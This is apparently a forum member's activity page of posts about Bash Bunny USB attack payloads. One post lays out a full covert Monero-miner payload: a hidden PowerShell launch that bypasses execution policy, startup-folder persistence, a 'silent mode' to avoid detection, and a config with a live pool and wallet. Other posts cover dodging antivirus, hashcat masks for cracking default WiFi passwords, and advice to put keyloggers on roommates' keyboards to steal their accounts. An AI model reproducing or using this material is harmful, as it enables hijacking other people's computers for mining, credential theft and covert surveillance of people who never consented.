Jump to content


Active Members
  • Content Count

  • Joined

  • Last visited

  • Days Won



About icarus255

  • Rank
    Hak5 Fan ++

Recent Profile Visitors

539 profile views
  1. I don't really know much about encoding audio and audio formats but it sounds pretty interesting so I'll check it out this weekend. There are some practical limitations though. At 0.15KB/s you aren't going to be ex-filtrating much but it's a sneaky way to exfil once you encode the data. What will this overcome? If you can execute the loader then you can execute the main bin or did I miss something? Yea you can call it the SneakyKitten 😉 Nah I'm jk. I was only asking what the sneaky kitten bins were because there was no description on github. Anyway SqueakyKitten has a better ring to it.
  2. Pretty sweet idea dude. I like it but do you have some instructions or a readme file for noobs like myself to follow? What are those squeaky kitten binaries? I would rather compile from source if you get what I'm saying 😉
  3. This is not just an old people thing. A lot of ISPs (at least here in Australia anyway) use phone numbers as default wifi passes for the 3G and 4G modems (and many others). And yes I agree, this is a great way to start your brute forcing. You don't need to pipe this through crunch though. You can use hashcat's mask generator 😉 hash64.bin -a 3 -m 2500 TelstraA84A9F.hccapx 253?d?d?d?d?d?d?d (this will generate 7 random numbers following "253" which presumably you know). A lot of the netgear modem/routers use a combination of adjective+noun+XXX (where xxx is 3 random digits) e.g. "luckybanana437". I had a list specific to netgear's factory passes somewhere so let me know if you want me to find it and I will upload it somewhere. Netgear Arlo base stations used this for their camera systems as well 😄 10 random hex chars is another favourite default pass but that can become unmanageable unless you have multiple GPUs or some really neat rules to minimise the cracking time. I guess it's worth mentioning that rockyou.txt gets a few hits every once in a while as well. Most people never change their default passes so bottom line: doing a bit of research at the start will save you a LOT of brute forcing time down the track 😉
  4. Yea that has always been an end goal for this little project but crypting miners is a big step from writing simple startup scripts. I looked into this a while back and I had some general ideas on how to approach it but not sure if my coding skills are up to the challenge. Fuck it, you have inspired me. I'm just going to no-life this for a month or so. What's the worst that could happen? 🙂
  5. Wow! Very ambitious project. The mother of all "payloads" so to speak 🙂 I don't dare to imagine the coding (or debugging) involved. Please keep us updated. You have my vote 😄
  6. Mining can refer to any sort of crypto mining but in this instance we are mining Monero. Monero is a good choice because it's impossible to trace (or so they say) and you can mine it with a CPU. I wrote this for fun and when crypto mining was the cool thing to do. I would still like to figure out how to crypt the miner so the AV doesn't pick it up but don't hold you breath for that one 😉
  7. I feel for you, brother. Every man has the right to watch his porn undisturbed. I wouldn't worry too much about your traffic being watched. Most internet traffic is now encrypted especially if you have a VPN so make sure you use it. You can use the same VPN settings on your phone. Check with your VPN provider website, they may even have an app to automate it for you. Some websites don't encrypt pictures or you room mates might be stripping ssl off from your connections. Either way, once you connect through a VPN, you should be ok. As for revenge, put a keylogger ($30 each online and not too difficult to use) on their keyboards and collect their passwords, accounts, etc 😉 Make sure to keep us updated 🙂
  8. I don't know why people bother installing anything else 😄 I boot up kali every once in a while and I thought tails was pretty good if you need to hit the dark web etc.
  9. Whoa!!! Take it easy, my man. Which payloads did you try? You can't say not a single payload works after trying 4 payloads out of the 50 or so. I haven't used the pineapple so I can't comment on it but I personally like the BB if for nothing else than the educational journey. Most of the payloads DO work but some are probably being blocked by your AV or windows defender. Account privileges or execution policy could also prevent some of the payloads or scripts from "working". A lot of the payloads also need to be configured. It doesn't mean you need to know how to code but at least read the "readme" file for instructions. Try using some of the payloads outside the "credentials" folder... some of those actually don't work anymore for obvious security reasons. We're all new to this kind of stuff so take the opportunity to explore it and learn a few things along the way.
  10. Thanks, amigo. I never had much success with the cred-stealing payloads but never really investigated them properly either. I will definitely check this out over the weekend.
  11. OK, please forgive my ignorant comments above :))))))
  12. Thanks for the payload. I will check this out but I think the AV or even Windows Defender will detect the meterpreter payload when you try to execute the shell code. As in, it will probably let you run the Hershell binary but when you try to upgrade to a meterpreter session, it will get picked up... or am I missing something? Anyway, before I say anymore I will try to give it a go on the weekend.
  13. My first payload for the BB ? I just wanted to start off by saying that I don’t have a background in IT, I’m just an enthusiast. I did this really just to get more familiar with scripting and security, so I welcome any comments/criticisms. I should note that Ar1k88 posted mining payloads sometime ago so creds to him for the original idea. I ended up writing my own scripts rather than editing his ones and made some improvements e.g. combining the CPU and GPU miners into one payload, adding persistence, silent mode, etc. Some notes below if you care: Silent Mode You can set the miners to run in the background by editing the startup.vbs script and change “1” to “0” on line 3 & 4 or change the .json config file line 11 from “false” to “true”. The CPU usage is also editable in the config file so you can set it to a lower value and avoid visibly slowing down the host’s performance (at the expense of the hash rate). Once you execute the GPU miner, the computer will become almost non-responsive so definitely noticeable. Persistence I liked the idea of a VB script that runs on every startup which then subsequently initiates the miners. Windows of course didn’t like the idea of running scripts (I don’t know if this is a default security setting) but adding the vbs file as an exception to the execution policy seems to have fixed that (reference line 16 of run.ps1). Instructions You will need to download the xmrig binaries (or compile from source). Your browser and/or AV will most likely try to block the downloads. Windows Defender doesn't seem to mind though. https://github.com/xmrig/xmrig/releases https://github.com/xmrig/xmrig-nvidia (sorry I forgot to add AMD support but it’s getting late and I have work tomorrow) Copy the downloaded exe files (xmrig.exe and xmrig-nvidia.exe) and the following files into switch 2 folder in BB: payload.txt # Title: Silent Monero Miner (with persistence) # Description: Monero CPU miner (https://github.com/xmrig), copies the miner and config files to local disk, and adds a script to startup # Author: icarus255 # Props: 0dyss3us (KeenanV) - I like his idea of adding the VB script to startup # Version: 1.0 # Category: Mining # Target: Windows 10 # Attackmodes: HID, Storage # Comments: You will need to download the binaries from (https://github.com/xmrig/) or compile from source # Silent mode: You can start in silent mode (background) by changing config.json line 16: "background": false, -> "background": true, #Setup LED SETUP ATTACKMODE HID STORAGE GET SWITCH_POSITION #Wait for drive recognition Q delay 4500 #Run the Powershell script starts the miners, copies the files to local disk, and adds to startup. LED ATTACK RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')" LED FINISH run.ps1 $Drive = (Get-WMIObject Win32_Volume | ? { $_.Label -eq 'BashBunny' }).name $user= $env:UserName $cpuminer = $Drive + "payloads\switch2\xmrig.exe" $configfile = $Drive + "payloads\switch2\config.json" $startupscript = $Drive + "payloads\switch2\startup.vbs" $nvidiaminer = $Drive + "payloads\switch2\xmrig-nvidia.exe" $StartupFolder = ("C:\Users\" + $user + "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup") $LocalFolder = ("C:\MoneroTest") Set-Location -Path $Drive + "payloads\switch2" copy-item -Path $cpuminer -Destination (new-item -type directory $LocalFolder) -force -ea 0 copy-item $configfile -Destination $LocalFolder copy-item $nvidiaminer -Deistnation $LocalFolder copy-item $startupscript -Destination $StartupFolder Unblock-File -Path $StartupFolder + "startup.vbs" Set-Location -Path $StartupFolder Start-Process cmd -ArgumentList "/c start startup.vbs" config.json { "algo": "cryptonight", "api": { "port": 0, "access-token": null, "worker-id": null, "ipv6": false, "restricted": true }, "av": 0, "background": false, "colors": true, "cpu-affinity": null, "cpu-priority": null, "donate-level": 5, "huge-pages": true, "hw-aes": null, "log-file": null, "max-cpu-usage": 75, "pools": [ { "url": "pool.minexmr.com:4444", "user": "424MefYkUWB16pj42Fcsu1DVeGyywsoeY96oQkLcokoKSU2WyywLNdRXj2ms7y2JQk7c4QpTtsxZsdspHbWiwzc91rbBCjL", "pass": "x", "rig-id": null, "nicehash": false, "keepalive": false, "variant": 1 } ], "print-time": 60, "retries": 5, "retry-pause": 5, "safe": false, "threads": null, "user-agent": null, "watch": false } startup.vbs Dim WshShell Set WshShell = WScript.CreateObject("WScript.shell") WshShell.Run "powershell.exe C:\MoneroTest\xmrig.exe", 1, False WshShell.Run "powershell.exe C:\MoneroTest\xmrig-nvidia.exe", 1, False
  14. You have not, amigo. I've owned my BB for about a year now and yes, the forum activity has decreased over those months but I can only blame people like myself for not contributing more to the discussions/ideas. That being said, I hop on regularly to check what's new as well as answer any PMs I may get. The platform itself continues to work despite the decreased forum activity. As far as new content goes, I am happy with what has been provided already. The content delivered so far has given me plenty of my own ideas to work on and more importantly I now have a tool to exploit attack vectors that I wasn't familiar with before. The BB is an excellent delivery platform with many payloads that still work despite what some are saying. I guess stealing creds is what most people are excited about when they first see the BB but that also happens to be on the top of every vendor’s list of shit to patch so yea those payloads have always had varying success but that's not to say they can't be modified to your needs. The BB is limited only by your skills and your imagination.
  15. Firstly, just wanted to say thanks. I've been looking for something like this - love your work. I still have much to learn about the Bash Bunny and IT security in general but love these forums. I will share what I can. Yes, I can confirm that if you unplug the BB from USB the cpuminer keeps running in the background/memory. I know this is probably going against your wishes but I was pretty excited when I figured this out on my owns so thought I would share my findings with those who asked. I looked up the usage of the cpuminer and by appending "--help" I got a list of all the additional command line arguments. By appending -B you can set the miner to run in the background so all you have to do is edit the startup script i.e. 1.cmd And I'm sure making it persistent will not be too hard once I get more familiar with power shell and BB. The hardest part is getting past the AV products as all these miners are now added to the definitions regardless of whether you use them for legitimate purposes or not. Windows Defender didn't block the software...
  • Create New...